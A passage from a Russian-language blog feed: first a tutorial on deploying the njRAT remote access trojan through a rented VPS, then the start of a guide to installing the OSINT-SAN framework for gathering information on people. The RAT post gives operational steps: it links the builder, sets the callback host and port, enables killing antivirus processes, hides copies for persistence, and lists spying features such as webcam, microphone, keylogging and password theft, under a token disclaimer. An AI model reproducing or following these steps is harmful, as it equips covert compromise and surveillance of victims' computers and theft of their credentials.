]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@hunterghoul_team/rat</guid><link>https://teletype.in/@hunterghoul_team/rat?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=hunterghoul_team</link><comments>https://teletype.in/@hunterghoul_team/rat?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=hunterghoul_team#comments</comments><dc:creator>hunterghoul_team</dc:creator><title>RAT, NAT и прослушка - получаем удаленный доступ к ПК.</title><pubDate>Mon, 28 Oct 2024 11:34:07 GMT</pubDate><media:content medium="image" url="https://img2.teletype.in/files/5e/fc/5efc69c0-a42b-48a1-ad90-70eda95864e9.png"></media:content><category>Hacking</category><description><![CDATA[<img src="https://img4.teletype.in/files/b1/7e/b17e3537-fb02-41b3-98f4-ea3463c0d2b8.png"></img>Remote access trojan (RAT, от англ. Троян удаленного доступа) - троян, предоставляющий атакующему удаленный доступ к информационной системе. Как правило ратники (так называют в обиходе данные вирусы) делятся по системам: для Android, IOS, Windows. Есть платные и бесплатные, с закрытым и открытым кодом. Мы с вами посмотрим на один из примеров данной программы дабы разобраться, как оно работает, на все подводные камни данной штуки.]]></description><content:encoded><![CDATA[
  <h3 id="Rch8">Введение</h3>
  <p id="pCi6">Remote access trojan (RAT, от англ. Троян удаленного доступа) - троян, предоставляющий атакующему удаленный доступ к информационной системе. Как правило ратники (так называют в обиходе данные вирусы) делятся по системам: для Android, IOS, Windows. Есть платные и бесплатные, с закрытым и открытым кодом. Мы с вами посмотрим на один из примеров данной программы дабы разобраться, как оно работает, на все подводные камни данной штуки.</p>
  <h3 id="PNUR">Дисклеймер</h3>
  <p id="5Iil">Действия показанные в данной статье караются законом, вся описанная информация несёт исключительно образовательный характер. Не пытайтесь применять это на практике.</p>
  <h3 id="XDd5">Глава 1 - кажется что-то не работает.</h3>
  <p id="kfK8">И так, как я уже ранее и сказал, наша цель - получить удаленный доступ к компьютеру жертвы. В моем примере жертвой будет мой компьютер, а админом - арендованный Windows Server.</p>
  <p id="Li8T">Но почему так? А всё просто, и сейчас я тебе объясню что будет, если ты попытаешься со своего компа заслать вирус жертве.</p>
  <figure id="qfkZ" class="m_column">
    <img src="https://img4.teletype.in/files/b1/7e/b17e3537-fb02-41b3-98f4-ea3463c0d2b8.png" width="1080" />
    <figcaption>NAT - network address translation (преобразование сетевых адресов)</figcaption>
  </figure>
  <p id="d45H">В далеком бородатом году, когда люди стали подключаться к глобальной сети интернет, протокол идентификации сетевых устройств (ip; internet protocol от англ. межсетевой протокол) 4 версии имел достаточно ограниченное количество адресов - 4 294 967 296. Т.е. всего интернетом могло пользоваться чуть более 4-х миллиардов устройств. Но так уж вышло, что люди подсели на порнушку, аську и прочие приколюхи, что-то вроде донатов на наноферму (а могли бы мне донатить) и так далее. И вот, семь миллиардов человек по приблизительному подсчету, стали стремительно поглощать интернет. А тут ещё и всякие провайдеры, дата-центры и прочие корпоративные коридоры серверов стали мгновенно сжирать все запасы адресов. И тут <a href="https://ru.wikipedia.org/wiki/%D0%98%D0%BD%D0%B6%D0%B5%D0%BD%D0%B5%D1%80%D0%BD%D1%8B%D0%B9_%D1%81%D0%BE%D0%B2%D0%B5%D1%82_%D0%98%D0%BD%D1%82%D0%B5%D1%80%D0%BD%D0%B5%D1%82%D0%B0" target="_blank">IETF</a> (Инженерный совет Интернета) начал понимать, что такими темпами интернет закончится и новые пользователи не смогут подключиться к вообще-то ИНТЕРНАЦИОНАЛЬНОЙ сети, т.е. к мировой. А значит она уже станет не такой уж и мировой и всей этой утопичной идее придет конец. </p>
  <p id="0PtE">Тогда людям пришло в голову одновременно две гениальные вещи:</p>
  <ol id="6mrK">
    <li id="cbTH">Расширить количество адресов. Таким образом ipv4 заменил ipv6. Или не заменил? Ну, в целом идея была хороша - ибо в 6 версии протокола ip таких уникальных адресов стало бы аж <strong>340 282 366 920 938 000 000 000 000</strong>. Но, технически перевести всю аппаратуру на новую версию протокола сложно, а потому, данный процесс медленно пытается по сей день двигаться.</li>
    <li id="P4Rf">Методы делегирования адресов. Тут всем на помощь пришла популярная метода NAT.</li>
  </ol>
  <p id="kj9P">И так, если с ipv6 всё понятно, то в чем суть NAT.</p>
  <p id="3CkJ">Вы подписываете договор на подключение с вашим провайдером. Далее провайдер подключает свой провод к вашему... пк? роутеру? Кто знает...</p>
  <p id="XiWh">И тут есть нюанс:</p>
  <ol id="UyCj">
    <li id="W9J4">Подключение по этому проводу провайдера между тобой и провайдером происходит по протоколу PPPoE. По сути это такой протокол, при котором чтобы тебе подключиться к интернету провайдера, нужно иметь логин и пароль. Можно ли подрезать кабель и сбрутить акк? Хз, не пробовал) но вполне возможно.</li>
    <li id="wnJa">Подключение между тобой и провайдером идёт по протоколу DHCP. Здесь в таком случае если сосед спиздит у тебя провод и воткнет себе, то у него будет работать интернет, ибо никаких логинов и паролей для этого не надо. Надежно? - да пиздец.</li>
  </ol>
  <p id="Xp4y">Ну вот мы подписали договор, идёт у нас электрический ток по интернет кабелю, присылаются единички (0.5-1v) и нули (&lt;0.5v), компьютер/роутер считывает данные сигналы и преобразует их в соответствующие кадры, пакеты и т.д. - всё как завещала модель <a href="https://ru.wikipedia.org/wiki/%D0%A1%D0%B5%D1%82%D0%B5%D0%B2%D0%B0%D1%8F_%D0%BC%D0%BE%D0%B4%D0%B5%D0%BB%D1%8C_OSI" target="_blank">OSI</a>.</p>
  <p id="jL3v">Далее, ответьте на простой вопрос - куда идёт весь ваш трафик когда вы заходите на свой любимый <a href="https://otvet.mail.ru/question/222816714" target="_blank">оранжевый ютуб</a>?</p>
  <p id="zovy">Раньше, ваш запрос бы шёл НАПРЯМУЮ на ip адрес сервера сайта, к которому вы обратились. Этот ip называется белый ip, или - статический. Т.е. вам выделен один конкретный ip адрес по договору с вашим провайдером.</p>
  <p id="uroN">Но так как сейчас беда и этих белых адресов не хватает, то его закупает себе контора провайдеров, подключает с ПРЯМЫМ выходом в интернет свои главные сервера, а дальше создаёт большую, тернистую и страшную локальную сеть, к которой подключены их серваки для распределения нагрузки, фильтрации трафика, прослушки, и где-то там в конце, наконец, подключены по договору мы, их клиенты. Такой ip называется серым, локальным, может быть динамическим и статическим, но чаще динамический. Он внутренний локальный. Т.е. поймите главную вещь - в интернет выходим не мы, а наш провайдер. Через него идёт весь трафик и направляется нам.</p>
  <figure id="6Emk" class="m_column">
    <img src="https://img3.teletype.in/files/27/ce/27ce028b-003e-4b25-9135-962695293e18.png" width="1101" />
    <figcaption>Серые ip (мы) - белые ip (сервера, сайты и т.д.)</figcaption>
  </figure>
  <p id="0KHP">Такая схема очень напоминает атаку посередине - т.е. когда между тобой и твоим собеседником стоит некая темная личность, которая может исказить то что ты говоришь, и обратно, сказать тебе то, что тебе не говорили. Или вообще ничего не сказать, что называется у нас блокировкой сайтов).</p>
  <figure id="198j" class="m_column">
    <img src="https://img3.teletype.in/files/6a/0f/6a0ffc2d-80ca-4035-9416-4079c3705e9a.png" width="900" />
    <figcaption>Атака &quot;человек посередине&quot; - MITM.</figcaption>
  </figure>
  <p id="DZrl">А теперь возвращаемся к сути вопроса - как жертва подключится к нам, т.е. предоставит удаленный доступ? Ответ - никак. Ну, или почти никак. Всё что она будет, так это стучать на наш внутренний ip адрес (которого нет публично в сети Интернет), либо стучать на публичный ip адрес нашего провайдера, который мы можем посмотреть, зайдя например <a href="https://2ip.ru/" target="_blank">сюда</a>.</p>
  <p id="stw4">На своем примере ниже показываю как это выглядит:</p>
  <figure id="ahRI" class="m_column">
    <img src="https://img1.teletype.in/files/8a/ec/8aece70a-7c64-48b0-bc47-e4424c4bc457.png" width="1181" />
  </figure>
  <p id="FKro">Слева где замазанный ipv4 - это ip, назначенный провайдером. Справа - это ip сервера провайдера, к которому я подключен по своему локальному ip типа 10.34.x.x. Вот тот что справа (95.83.x.x) посылает запрос на сайты, получает ответ и переадресовывает мне, на мой локальный ip 10.34.x.x.</p>
  <p id="Pm1A">Вот так работает интернет. Так что зараженный пк нашим ратником на данном этапе будет долбиться лбом об стену (ну или об пол, призывая <s>бога</s> антивирус).</p>
  <h3 id="EAJ4">Глава 2 - чиним наш интернет.</h3>
  <p id="hGEr">Разобравшись с проблемой поговорим о способах решения и о других попутных проблемах:</p>
  <ol id="UFVY">
    <li id="xP6p">Запрос на выделение статического ip адреса. Звоним нашему провайдеру и просим дать нам выделенный ip адрес. Как правило большинство провайдеров за дополнительную стоимость без проблем предоставят вам белый ip адрес. На него то вы и будете клипать ваш вирус. Какие проблемы? - то что жертва при должной сноровке увидит, что некий подозрительный файл стучится по такому-то ip адресу. И этот ip адрес конечно же будет ВАШ). Ну а дальше останется только надеть маску анонимуса, оставить ключики под ковриком и ждать БСТМ.</li>
    <li id="WX1z">Backend на хостинге. Да, можно написать backend часть на например <a href="https://www.php.net/" target="_blank">php</a>, и указать вашему rat стучаться на ваш сайт к этому файлу, который бы ретранслировал соединения на ваш комп с запущенной админкой. Стильно, модно, по хакерски.</li>
    <li id="mUW7">Аренда VPS. Этот способ я сегодня вам и покажу, потому как он менее затратный, не требует знаний backend разработки, да и вообще для нубасиков вроде меня самое то. Здесь мы получаем систему с уже белым ip, не нашим, к которому злоумышленник бы подключался по vpn, тем самым обезопасив себя от <a href="https://skillbox.ru/media/code/deanon-i-doksing-kak-khakery-raskryvayut-lichnosti-polzovateley-v-ceti/" target="_blank">деанона</a>.</li>
  </ol>
  <p id="8Gev">И так, погнали реализовывать третий пункт.</p>
  <p id="rfq4">Первое что сделаем - зарегаем аккаунт на <a href="https://www.google.com/search?q=vps+windows+server" target="_blank">каком-нибудь VPS</a> и потратим пару шекелей на счёт.</p>
  <figure id="RulN" class="m_column">
    <img src="https://img4.teletype.in/files/72/f9/72f9f671-99f7-4b4f-b666-a1a6be5dde5b.png" width="632" />
    <figcaption>Арендованный сервер</figcaption>
  </figure>
  <p id="8eKn">После того как мы регнули акк и пополнили счёт (в некоторых местах можно криптой пополнить, что удобно) - арендовываем windows server. </p>
  <p id="w9Hl">Лично я выбрал такие параметры: Windows Server 2022 RAM 4GB Хранилище 60GB Процессор 2 Ядра.</p>
  <p id="Cpzk">Вот, теперь нам нужно подключиться к нему. В Windows есть встроенная утилита &quot;Подключение к удаленному рабочему столу&quot;.</p>
  <figure id="RmDG" class="m_column">
    <img src="https://img4.teletype.in/files/70/1b/701be585-2e54-47ca-835e-b9ecc866911e.png" width="531" />
    <figcaption>Программка на Windows для RMS.</figcaption>
  </figure>
  <p id="Yg9V">На линуксе можно установить <a href="https://remmina.org/" target="_blank">Remmina</a> или любой другой RMS на выбор.</p>
  <p id="Qk8L">RMS (Remote Manipulator System - удаленное администрирование системой). Не троян, носит легальный характер доступа к удаленному пк, типо как тот же SSH.</p>
  <p id="o5Cn">Вводим ip от нашего сервака, логин и пароль. И видим рабочий стол арендованой винды.</p>
  <figure id="qTRQ" class="m_column">
    <img src="https://img3.teletype.in/files/24/9a/249a4955-8841-4df8-acef-c78d3208ee59.png" width="1919" />
    <figcaption>Рабочий стол Windows Server 2022 (программа Windows Server).</figcaption>
  </figure>
  <p id="x0K5">Здесь нас встречает встроенная прога на windows server - она нам понадобится чтобы установить некоторые зависимости.</p>
  <p id="84dc">Нам нужно тыкнуть здесь вот сюда:</p>
  <figure id="rR3h" class="m_column">
    <img src="https://img3.teletype.in/files/e4/81/e481af92-d341-4345-9a11-f1da3127b25c.png" width="1912" />
  </figure>
  <p id="za9z">В открывшемся окне жмем next до момента, пока не дойдем до Features:</p>
  <figure id="7NUt" class="m_column">
    <img src="https://img1.teletype.in/files/85/fe/85fe0d20-d9bb-45a5-a2c0-fec56db9c4ca.png" width="975" />
  </figure>
  <p id="0Pm4">Здесь ставим первую галочку (устанавливаем .NET Framework 3.5.). Ну и в целом готово, далее по вкусу можно русифицировать систему. Жмякаем next, далее на кнопку install и пойдет процесс установки зависимостей.</p>
  <p id="8WP1">По окончании нас встретит такое окно, означающее окончание установки:</p>
  <figure id="B5vM" class="m_column">
    <img src="https://img3.teletype.in/files/6b/43/6b434541-04ed-494e-a825-3c44161a3a06.png" width="967" />
  </figure>
  <p id="NX1H">Это окно и прогу можно закрывать.</p>
  <p id="6joe">Теперь берем наш билдер (генератор вируса), нажимаем ctrl+c, заходим в окно с windows сервер, и вставляем туда, ctrl+v. Всё, у нас через инет закачается наш билдер. Заранее через winrar сделайте sfx архив с паролем, чтобы нигде антивир ничего не удалил, и предварительно отключите их у себя и на windows server.</p>
  <p id="saA2">Поискав несколько ратников, нашел вот этот рабочий - <a href="https://github.com/BlackAll9/NjRat.0.7D" target="_blank">NjRAT</a>.</p>
  <p id="Pimy">Запускаем Danger edition и видим такое окно:</p>
  <figure id="SLqf" class="m_column">
    <img src="https://img2.teletype.in/files/90/89/90897f55-4a16-4d7e-83b5-2e3e72654089.png" width="1009" />
    <figcaption>Окно NjRat</figcaption>
  </figure>
  <p id="s5bL">Там где порт - указываем любой порт, который не будет занят. Обычно это между 1000 и 10000. Например выберем тот порт с которого я познакомился с ратниками, ещё когда по юпупам гуляли видосы про <a href="https://www.youtube.com/watch?v=rIbsXQc2Pe0&pp=ygUXZGFyayBjb21ldCByYXQg0YPQs9Cw0YA%253D" target="_blank">darkcometrat</a> - 1604. Пароль поставим 12345.</p>
  <figure id="87gv" class="m_column">
    <img src="https://img1.teletype.in/files/80/19/80191cc0-b27b-4b3d-bcde-d2f9413e9ca7.png" width="1006" />
  </figure>
  <p id="BwpR">Жмем Save и Start</p>
  <p id="7SJK">Теперь у нас прослушивается трафик на 1604 порту. Нам надо создать вирус, который бы на него стучался. Т.е. стучался на нашip:нашport. В моем случае это будет 150.241.91.82:1604.</p>
  <p id="TPp6">Для этого жмем внизу проги на слово-ссылку <code>builder</code>.</p>
  <figure id="JG52" class="m_column">
    <img src="https://img2.teletype.in/files/dd/27/dd270528-45dd-4058-a6ea-cacc66732d01.png" width="1271" />
  </figure>
  <p id="AMCq">У нас откроется такое окно и даа.. - у вас откроется тромб от увиденного разнообразия и непонимания всего происходяего.. ща всё в краце поясню.</p>
  <figure id="HP8z" class="m_column">
    <img src="https://img4.teletype.in/files/b7/ff/b7ff4f3f-a371-42c7-935a-654c5e3ef9fc.png" width="771" />
    <figcaption>Картина Репина - инфаркт жопы.</figcaption>
  </figure>
  <p id="WLhc">Ну первым делом Host и порт - здесь вместо локального ip по-умолчанию (127.0.0.1) вставляем наш, тот, по которому мы подключились к серваку. В моем случае это 150.241.91.82.</p>
  <p id="6XtW">Далее галочка Kill Anti Process и Copy Directory включает нам следующие окошки:</p>
  <figure id="ptYh" class="m_column">
    <img src="https://img1.teletype.in/files/82/a4/82a47083-0792-4c80-950e-be382874e2b0.png" width="818" />
  </figure>
  <p id="xjcP">Анти-процесс - закрывает указанные проги которые мы выбрали. То есть наш ратник следит за процессами в системе, и как только видит какой-то из выбранных нами - сразу же его убивает. Это позволяет бороться с установщиками антивирусов и прочими прогами, которые могут спалить нас или наш ратник.</p>
  <p id="kx4h">Копирование в директории - просто копирует наш вирус во многие места, чтобы его было тяжелей найти и удалить.</p>
  <p id="SxFX">Остальные функции не так интересны, так что, оставим всё выключенным для теста, единственное только добавим наш хост, введя ip нашего сервера и нажав на кнопку <code>Added</code>.</p>
  <figure id="RqSD" class="m_column">
    <img src="https://img3.teletype.in/files/ea/18/ea186a70-5f74-4aa1-97fe-eb73d56ae662.png" width="1339" />
  </figure>
  <p id="5kML">После этого у нас появится наш зашифрованный паролем хост и кнопка Build, на которую мы жмякаем и собираем ратник.</p>
  <figure id="ZDZr" class="m_column">
    <img src="https://img2.teletype.in/files/59/ce/59ce3e2c-7d75-4617-9d84-777e12b7d1ca.png" width="1437" />
  </figure>
  <p id="TkCZ">Готово. Наш вирус создан, и теперь пробуем закинуть его себе на комп (но лучше не быть экстремалом как я, а загрузить его на виртуалку) и протестить</p>
  <p id="3N4J">Но, после запуска ничего не случилось - поэтому на сервере пришлось отключить файрвол чтобы всё заработало:</p>
  <figure id="jsVm" class="m_column">
    <img src="https://img1.teletype.in/files/0a/0c/0a0c3a98-4b6e-4c78-9e02-1e3049ebd85d.png" width="1165" />
  </figure>
  <figure id="Fn0a" class="m_column">
    <img src="https://img3.teletype.in/files/e7/59/e759e643-f129-4b53-be07-58cfc7db986f.png" width="1010" />
  </figure>
  <p id="DQh3">На самом деле конечно отключать его не стоит, достаточно просто пробросить наш порт в настройках файрвола, но мы не будем этим сейчас запариваться.</p>
  <h3 id="R9pN">Глава 3 - функционал.</h3>
  <p id="ovrd">И так, для примера я повторил это всё во второй проге из папки с ратниками, и вот что вышло:</p>
  <figure id="I9HY" class="m_column">
    <img src="https://img3.teletype.in/files/ef/a5/efa55488-f7ad-4c14-8e1c-51540d56f30c.png" width="1052" />
  </figure>
  <p id="haru">Это наш зараженный комп. Таких может быть много.</p>
  <p id="lb33">Теперь кликнув правой кнопкой мыши мы можем увидеть функции, доступные нам.</p>
  <figure id="84oS" class="m_column">
    <img src="https://img1.teletype.in/files/83/9f/839f0b1f-a30b-4e8a-81b4-8bc6e88eec66.png" width="1062" />
  </figure>
  <p id="C2ZK">Менеджер контроля:</p>
  <figure id="JUvJ" class="m_column">
    <img src="https://img4.teletype.in/files/b3/6f/b36ff382-df73-4bcc-b540-b5db18e47177.png" width="828" />
  </figure>
  <p id="8LZN">Даёт нам возможность получить доступ к файловой системе, реестру, командной строке, процессам и службам, а также посмотреть текущие сетевые подключения. Здесь же мы можем скачать, загрузить и запустить любые файлы, например другие вирусы.</p>
  <p id="hXOf">Вторая функция запуска файла повторяет тоже самое. Позволяет выбрать наш файл на компе, отправить его во временную папку и запустить.</p>
  <p id="tSIf">Удаленный экран</p>
  <figure id="egUi" class="m_column">
    <img src="https://img1.teletype.in/files/8c/ff/8cff157d-6526-49ac-aa88-806d5ced8ad7.png" width="1092" />
  </figure>
  <p id="gNNr">Позволяет совместно проводить время с жертвой за просмотром культурных фильмов. А функция удаленной камеры и микрофона ещё и позволит проникнуться полностью его эмоциями и впечатлении о происходящей на мониторе картине. Помимо этого удаленный экран дает возможность перехватить управление мышкой и клавиатурой, делать скрины и запись экрана в некоторых ратниках.</p>
  <p id="zs5H">Остальные функции думаю и так понятны, сами попробуйте и потыкайте. Воровалка паролей ворует пароли, кейлогер записывает то, что печатает на клавиатуре жертва.</p>
  <p id="K8Na">Кнопка сервер позволяет удалить или обновить наш ратник, например, когда мы обновили его версию, по новой закриптовали (зашифровали для того чтобы антивирусы не видели вирус как вирус).</p>
  <h3 id="KfIu">Каков итог?</h3>
  <p id="Qy30">Если ваш пк ведёт себя странно - посмотрите на процессы и соединения в службах Windows.</p>
  <p id="A3lz">Ратник позволяет легко управлять устройствами жертв, получая полный доступ и неограниченные возможности над ними - но раскрывает ip вашего сервера/vpn/proxy/etc...</p>
  <p id="0gM0">Используйте эту информацию чтобы проверить, как оно работает, и знать, как от этого можно защититься и даже сдеанонить мамкина доксера.</p>
  <p id="hDSq">На связи был Hunter Ghoul, подписывайтесь на мой <a href="https://t.me/hunterghoul_team" target="_blank">канал</a> и до новых встреч.</p>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@hunterghoul_team/osint-san</guid><link>https://teletype.in/@hunterghoul_team/osint-san?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=hunterghoul_team</link><comments>https://teletype.in/@hunterghoul_team/osint-san?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=hunterghoul_team#comments</comments><dc:creator>hunterghoul_team</dc:creator><title>OSINT-SAN Framework - или чё такое OSINT.</title><pubDate>Sun, 27 Oct 2024 12:10:48 GMT</pubDate><media:content medium="image" url="https://img2.teletype.in/files/9c/db/9cdb5420-877d-4ebc-b8a4-4dbeae0ec295.png"></media:content><category>OSINT</category><description><![CDATA[<img src="https://github.com/Bafomet666/OSINT-SAN/blob/main/report/Screenshot%20at%202024-04-03%2017-29-19.png?raw=true"></img>OSINT-SAN Framework - это семейство OSINT-ориентированных утилит, предназначенных для упорядоченного сбора и хранения данных с помощью автоматизированных скриптов - парсеров.]]></description><content:encoded><![CDATA[
  <figure id="cAXt" class="m_column">
    <img src="https://github.com/Bafomet666/OSINT-SAN/blob/main/report/Screenshot%20at%202024-04-03%2017-29-19.png?raw=true" width="1644" />
    <figcaption>Картинка из Github разработчика</figcaption>
  </figure>
  <h3 id="Введение">Введение</h3>
  <p id="Mxwj">OSINT-SAN Framework - это семейство OSINT-ориентированных утилит, предназначенных для упорядоченного сбора и хранения данных с помощью автоматизированных скриптов - парсеров.</p>
  <p id="rYjp">Парсеры - это такие скрипты, которые на вход принимают некоторые данные, после чего обрабатывают их и сохраняют в удобном формате. Под обработкой понимается запрос на различные ресурсы и базы данных, где введенная информация сопоставляется с массивом других данных. Да, BIG DATA создаёт BIG BROTHER, так что парсеры заточены на то, чтобы вытащить релевантные данные по нашему запросу из массы источников.</p>
  <p id="wPCL">Если источники открытые, то, это как правило в разведывательных сообществах принято называть OSINT (open-source intelligence, англ. разведка по открытым источникам).</p>
  <p id="NYR3">Если же источники носят закрытый характер, например это какие-то федеральные базы, оперативное досье, сводки и так далее - это уже прямой путь в так называемый &quot;пробив&quot;. Т.е. к подкупу действующих сотрудников, имеющих посредственный или непосредственный доступ к базам данных, готовых за определенную сумму вытащить оттуда всю инфу по вашему целевому запросу.</p>
  <p id="CdZG">Но сегодня речь пойдет о clearnet, об открытых (по крайней мере относительно) источниках, и в частности о программе OSINT-SAN, потому как на её примере я хочу показать, кто такие на моё субъективное мнение асынтеры, те, которые действительно могут ими считаться.</p>
  <h3 id="Глава-лирическая---OSINT-NASRAL.">Глава лирическая - OSINT-NASRAL.</h3>
  <p id="f5KI">И так как я уже ранее упомянул, OSINT-SAN - это фреймворк, т.е. семейство инфо продуктов. В отличии от например глаза бога, он состоит не только из одного телеграм бота. OSINT-SAN состоит из 3-х клиентов:</p>
  <ol id="dno3">
    <li id="HYDe">Linux client - скачать можно <a href="https://osintsan.agency/download_client" target="_blank">тут</a>.</li>
    <li id="BJo2">Web client - найти можно <a href="https://osintsan.agency/" target="_blank">тут</a>.</li>
    <li id="uzpN">Telegram бот - он обитает <a href="https://t.me/Sworp_san_bot" target="_blank">тут</a>.</li>
  </ol>
  <p id="ht1G">В целом, почему назвал так данную главу - потому как на момент написания статьи работает это всё коряво, с багами и недоработками. Но, благо - работает!!! Да и цель не реклама продукта и даже не продвижение массы. Цель написание данной статьи иная, в конце поймете.</p>
  <h3 id="Linux-client---установка-и-использование.">Linux client - установка и использование.</h3>
  <p id="CbvI">Ну, погнали попробуем скачать и установить клиент на линукс.</p>
  <p id="SsMN">Требования:</p>
  <ol id="dM8k">
    <li id="e7MT">Я использовал kali linux, последняя версия для virtualbox. Про гипервизоры потом отдельно поговорим.</li>
    <li id="faY7">Нужен установленный python 3 версии. С поддержкой pip. В kali linux по умолчанию установлен.</li>
  </ol>
  <p id="cWxB">Ну вот и все собственно требования. Память на жестком диске, память оперативная. В общем всё по стандарту чтобы всё запустилось и работало.</p>
  <p id="YcXa">Теперь <strong>установка </strong>по шагам:</p>
  <ul id="zokw">
    <li id="YjE8">Мы с вами <a href="https://osintsan.agency/download_client" target="_blank">скачали</a> и распаковали архив последней версии клиента.</li>
  </ul>
  <figure id="pi94" class="m_column">
    <img src="https://img3.teletype.in/files/af/95/af95a611-2d46-4f6a-9687-2e2ca24bd23f.png" width="1920" />
    <figcaption>Распакованный клиент OSINT-SAN Framework.</figcaption>
  </figure>
  <ul id="YXDP">
    <li id="N03n">Далее открываем здесь командную строку, выполняем <code>sudo -i</code> чтобы стать root-ом, и далее просто запускаем установку клиента командой <code>python3 install.py</code>. Потребуется подключение к интернету и некоторое время чтобы установились все зависимости.</li>
  </ul>
  <figure id="cTsW" class="m_column">
    <img src="https://img3.teletype.in/files/ea/73/ea73051a-c0f3-4703-90cb-2254ec896e51.png" width="1920" />
    <figcaption>Запуск установки клиента.</figcaption>
  </figure>
  <ul id="c0bB">
    <li id="2ZDU">После успешного (но таки да, с ошибками...) завершения процесса установки нас будет ждать сообщение о том, как запускать данный клиент.</li>
  </ul>
  <figure id="bIEX" class="m_column">
    <img src="https://img2.teletype.in/files/d2/e5/d2e548a9-0243-461a-ab04-bf11206174eb.png" width="1920" />
    <figcaption>Завершение установки.</figcaption>
  </figure>
  <p id="UhHf">По итогу у нас при установке в папке клиента создалась папка для python-venv - OSINT-SAN_ENVIRONMENT. Давайте посмотрим в неё.</p>
  <figure id="FXVv" class="m_column">
    <img src="https://img3.teletype.in/files/60/b5/60b57a42-820b-441b-9a7e-34d8ecf20b11.png" width="1920" />
    <figcaption>Папка нашего клиента с OSINT-SAN_ENVIRONMENT</figcaption>
  </figure>
  <figure id="yGOS" class="m_column">
    <img src="https://img3.teletype.in/files/26/95/2695b1c0-1092-4f88-8923-9be502e4dff9.png" width="1920" />
    <figcaption>Содержимое папки OSINT-SAN_ENVIRONMENT</figcaption>
  </figure>
  <figure id="0B8C" class="m_column">
    <img src="https://img2.teletype.in/files/12/60/12601f06-b9cf-452a-b67a-3d8afe05c4ec.png" width="1920" />
    <figcaption>Содержимое файла activate</figcaption>
  </figure>
  <p id="ihWM">Если вы шарите за python, то для вас данный фреймворк должен стать хорошим другом для изучения того, как можно всё автоматизировать и красиво сделать с помощью данного ЯП (языка программирования).</p>
  <p id="uHN9">Теперь, пока вас не успел схватить инфаркт, поясняю - процесс запуска клиента мы с вами автоматизируем, чтобы не пришлось по сто раз вводить все эти команды.</p>
  <p id="LrEJ">Создадим с вами файл на рабочем столе, назовем его например osanrun.sh (.sh - это формат исполняемых файлов linux, bash скриптов.</p>
  <p id="uIvh">Теперь пропишем в нём следующее:</p>
  <figure id="81Pd" class="m_column">
    <img src="https://img4.teletype.in/files/f7/76/f7765d0b-d7f6-42d3-bfff-88eb1c8c6e07.png" width="1920" />
    <figcaption>Содержимое файла osanrun.sh</figcaption>
  </figure>
  <p id="hepB"><code>#!/bin/bash<br />cd /home/kali/Downloads/last_client/<br />source OSINT-SAN_ENVIRONMENT/bin/activate<br />python3 san.py<br /></code></p>
  <p id="VlfZ">Что здесь написано?</p>
  <p id="ARvs"><code>#!/bin/bash</code> - здесь мы вызываем работу в bash.</p>
  <p id="I9Zh"><code>cd /ваш_путь_до_клиента/</code> - здесь мы с вами переходим в папку с нашим клиентом (именно путь до клиента, не до <code>OSINT-SAN_ENVIRONMENT</code> ).</p>
  <p id="UEPZ"><code>source OSINT-SAN_ENVIRONMENT/bin/activate</code> - здесь мы задаем путь к нашей созданной python-venv библиотеке или как там правильно, не шарю.</p>
  <p id="yEAC"><code>python3 san.py</code> - здесь мы запускаем наш клиент.</p>
  <p id="TDgu">Сохраняем наш файл, открываем терминал на рабочем столе и пишем: <code>chmod +x &lt;название нашего файла&gt;</code> и запускаем командой <code>sudo ./osanrun.sh</code> (заменить на имя вашего файла).</p>
  <figure id="40f5" class="m_column">
    <img src="https://img4.teletype.in/files/37/3d/373d90b3-53bc-45c2-a558-a64a140ec1fa.png" width="789" />
    <figcaption>Команды для запуска нашего скрипта</figcaption>
  </figure>
  <figure id="TAen" class="m_column">
    <img src="https://img4.teletype.in/files/3a/25/3a258f67-ae3c-4098-9fe0-15d92cfc51ce.png" width="1920" />
    <figcaption>Окно OSINT-SAN</figcaption>
  </figure>
  <p id="SUh2">И да, ура, у нас запустился клиент. Теперь, нужно до установить зависимости - пишем слово <code>driver</code> и жмем <code>Enter</code></p>
  <figure id="RQSY" class="m_column">
    <img src="https://img2.teletype.in/files/db/83/db83553d-3462-425a-9aef-2ff1d001f217.png" width="1920" />
    <figcaption>Начало установки driver</figcaption>
  </figure>
  <figure id="U8UZ" class="m_column">
    <img src="https://img2.teletype.in/files/58/69/5869f852-3439-4345-ba9c-f017259ade77.png" width="1920" />
    <figcaption>Конец установки driver</figcaption>
  </figure>
  <p id="UC1K">На всё соглашаемся и после чего видим окончание установки. Для того чтобы очистить экран от всего лишнего вводим команду <code>clear</code></p>
  <p id="GLLe">Теперь авторизовываемся в клиенте, введя цифру 1.</p>
  <figure id="ljUO" class="m_column">
    <img src="https://img4.teletype.in/files/71/17/71179648-f413-4f16-814c-27f388728976.png" width="1920" />
    <figcaption>Авторизация</figcaption>
  </figure>
  <p id="lqoK">Здесь нас просят ввести логин и пароль от учетки. Учетка платная, благо у меня есть и я вам покажу платный клиент. Вы можете <a href="https://github.com/Bafomet666/OSINT-SAN" target="_blank">скачать</a> с гитхаба бесплатную версию и пощупать её.</p>
  <figure id="YZtv" class="m_column">
    <img src="https://img2.teletype.in/files/5a/86/5a861ed5-ba19-49d9-96ac-9588e082f313.png" width="1920" />
    <figcaption>Главное меню клиента</figcaption>
  </figure>
  <p id="k4lM">После авторизации нас встречает главное меню клиента.</p>
  <p id="GuqS">Красными словами написаны команды, введя которые мы перейдем в соответствующий модуль со ссылками на источники, где можно поосинтить интересующую нас фигню, а также воспользоваться встроенными инструментами и самописными парсерами.</p>
  <p id="J4oz">Попробуем на примере телефона, введя <code>phone</code>.</p>
  <figure id="cTJK" class="m_column">
    <img src="https://img3.teletype.in/files/26/46/2646ab20-034c-4f94-a4b8-8e728e0a3da0.png" width="1920" />
    <figcaption>Выдача по номеру</figcaption>
  </figure>
  <figure id="Emnz" class="m_column">
    <img src="https://img4.teletype.in/files/7d/7b/7d7be729-a5a7-4b3c-83f7-1a99f4fecdab.png" width="1920" />
    <figcaption>Выдача по номеру (продолжение)</figcaption>
  </figure>
  <p id="Utzd">Но это всё полная хрень по сравнению с главной (как по мне) функцией - возможностью создать отчёт.</p>
  <p id="5CnS">Для этого мы вводим команду <code>pdf</code> или <code>project</code></p>
  <figure id="6WFm" class="m_column">
